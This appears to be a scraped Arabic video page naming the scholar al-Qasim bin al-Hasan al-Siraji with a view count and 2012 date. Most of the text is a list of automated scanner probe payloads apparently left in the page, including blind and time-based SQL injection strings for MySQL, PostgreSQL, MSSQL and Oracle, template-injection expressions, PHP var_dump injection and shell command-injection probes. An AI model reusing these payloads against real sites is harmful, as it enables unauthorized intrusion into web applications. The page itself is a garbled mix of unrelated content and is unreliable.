To view this video please enable JavaScript, and consider upgrading to a web browser that يجب تفعيل الجافاسكريبت في متصفحك supports HTML5 video
السيد العلامة القاسم بن الحسن السراجي
المشاهدات 25113
تاريخ الاضافة 7/30/2012
123456
${838399051+935669127}
123456"and/**/extractvalue(1,concat(char(126),md5(1297204986)))and"
123456'and(select'1'from/**/cast(md5(1797720705)as/**/int))>'0
123456/**/and/**/cast(md5('1987142693')as/**/int)>0
123456'"\(
123456 expr 825777744 + 885652563
123456|expr 992300208 + 994155434
123456'and/**/extractvalue(1,concat(char(126),md5(1903730173)))and'
extractvalue(1,concat(char(126),md5(1757167469)))
${@var_dump(md5(635756503))};
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1310026953')))
'-var_dump(md5(578050641))-'
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1403321647')))>'0
123456鎈'"\(
/*1*/{{845295045+857310823}}
${833528316+984772346}
${(806518832+856701308)?c}
#set($c=859040246+997226926)${c}$c
<%- 906634568+931203666 %>
123456/**/and+0=0
123456$(expr 997121295 + 896127981)
123456/**/and+0=9
123456&set /A 851988569+841510725
123456'and'z'='z
expr 815146331 + 896416018
123456'and'w'='v
123456"and"x"="x
123456"and"o"="m
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('g',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',2)='l